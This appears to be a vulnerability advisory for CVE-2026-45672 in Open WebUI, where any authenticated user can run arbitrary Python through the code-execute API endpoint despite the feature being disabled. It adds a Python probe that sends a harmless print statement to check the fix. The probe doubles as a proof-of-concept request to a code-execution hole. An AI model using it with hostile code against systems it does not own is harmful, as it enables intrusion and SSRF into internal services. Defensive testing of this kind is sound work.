PT-2026-41202 · Unknown · Open-Webui

Published 2026-03-27 · Updated 2026-05-19 · CVE-2026-45672

CVSS v2.0: 9.0 (High)
Vector: AV:N/AC:L/Au:S/C:C/I:C/A:C
Name of the Vulnerable Software and Affected Versions: Open WebUI versions prior to 0.8.12

Description: Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. A flaw exists where the '/api/v1/utils/code/execute' endpoint allows any verified user (an authenticated account; no admin role is required) to execute arbitrary Python code via the Jupyter backend, even when the administrator has set the ENABLE_CODE_EXECUTION variable to false. The feature gate is not enforced on the API endpoint: the configuration reports the feature as disabled, but a client that calls the endpoint directly can still execute code. This allows authenticated users to execute arbitrary code within the Jupyter container, potentially leading to the reading of files, spawning of processes, and network access to internal Docker services, which can be used as a Server-Side Request Forgery (SSRF) vector to exfiltrate data from internal services.

Recommendations: Update to version 0.8.12 or later. As a temporary workaround, restrict access to the '/api/v1/utils/code/execute' endpoint, for example by denying the path at a reverse proxy or firewall in front of Open WebUI; on affected versions, setting ENABLE_CODE_EXECUTION to false does not by itself stop the endpoint. Limiting the Jupyter container's network reach to the services it actually needs also reduces the usefulness of the SSRF pivot described above.
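A defender who applies the workaround, or upgrades, wants to confirm that the endpoint is now refused for an ordinary user. The following probe is an added example, not code from Open WebUI or from the advisory: it sends one harmless request to '/api/v1/utils/code/execute' with a verified, non-admin user's API token and reports whether the server executed it. The request body shape ({"code": ...}), the meaning assigned to each status code, and the marker string are assumptions made here for illustration. Run it only against a deployment you own, with ENABLE_CODE_EXECUTION set to false.

```python
#!/usr/bin/env python3
"""Probe for the CVE-2026-45672 feature-gate bypass in an Open WebUI deployment.

Added example, not code from Open WebUI or the advisory. It sends one harmless
request to /api/v1/utils/code/execute with a normal (non-admin) user's token and
reports whether the server executed it. Run it only against an instance you
own, with ENABLE_CODE_EXECUTION set to false; a verdict of "executed" means the
gate is not enforced server-side.
"""
import argparse
import json
import sys
import urllib.error
import urllib.request

ENDPOINT = "/api/v1/utils/code/execute"

# The joined marker only appears in a response if the code actually ran; an
# endpoint that merely echoes the submitted source does not contain it.
MARKER = "cve_2026_45672_" + "probe"
PROBE_CODE = "print('cve_2026_45672_' + 'probe')"


def build_request(base_url: str, token: str, code: str = PROBE_CODE) -> urllib.request.Request:
    """Build the POST. The {"code": ...} body shape is an assumption about the
    endpoint's request schema, not something stated in the advisory."""
    body = json.dumps({"code": code}).encode()
    req = urllib.request.Request(base_url.rstrip("/") + ENDPOINT, data=body, method="POST")
    req.add_header("Authorization", f"Bearer {token}")
    req.add_header("Content-Type", "application/json")
    return req


def classify(status: int, body: str) -> str:
    """Map an HTTP status and response body to a verdict (assumed meanings)."""
    if 200 <= status < 300:
        # Marker in a 2xx body means the Jupyter backend ran our code.
        return "executed" if MARKER in body else "accepted"
    if status == 401:
        return "unauthenticated"      # token rejected; result inconclusive
    if status in (400, 403):
        return "gated"                # refused while authenticated
    if status == 404:
        return "blocked_or_absent"    # proxy deny rule or route not present
    return f"unknown_{status}"


def probe(base_url: str, token: str, timeout: float = 10.0) -> str:
    """Send the probe and return the verdict; HTTP errors are classified too."""
    req = build_request(base_url, token)
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return classify(resp.status, resp.read().decode("utf-8", "replace"))
    except urllib.error.HTTPError as err:
        return classify(err.code, err.read().decode("utf-8", "replace"))


def main(argv=None) -> int:
    ap = argparse.ArgumentParser(description=__doc__.splitlines()[0])
    ap.add_argument("base_url", help="e.g. http://localhost:3000")
    ap.add_argument("token", help="API token of a verified, non-admin user")
    args = ap.parse_args(argv)
    verdict = probe(args.base_url, args.token)
    print(verdict)
    # Non-zero exit when the gate was bypassed, so the probe can run in CI.
    return 1 if verdict in ("executed", "accepted") else 0


if __name__ == "__main__":
    sys.exit(main())
```

Usage: `python3 probe.py http://localhost:3000 <token>`. A verdict of "executed" on an instance configured with ENABLE_CODE_EXECUTION=false reproduces the flaw; "gated" or "blocked_or_absent" indicates the upgrade or the proxy rule is taking effect; "unauthenticated" means the token itself was rejected and the test is inconclusive; "accepted" (a 2xx without the marker) should be inspected by hand, since the response format is assumed here.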

Weakness Enumeration: Incorrect Authorization (CWE-863)

Related Identifiers

BDU:2026-07206
CVE-2026-45672
GHSA-482J-2PQ6-Q5W4

Affected Products

Open-Webui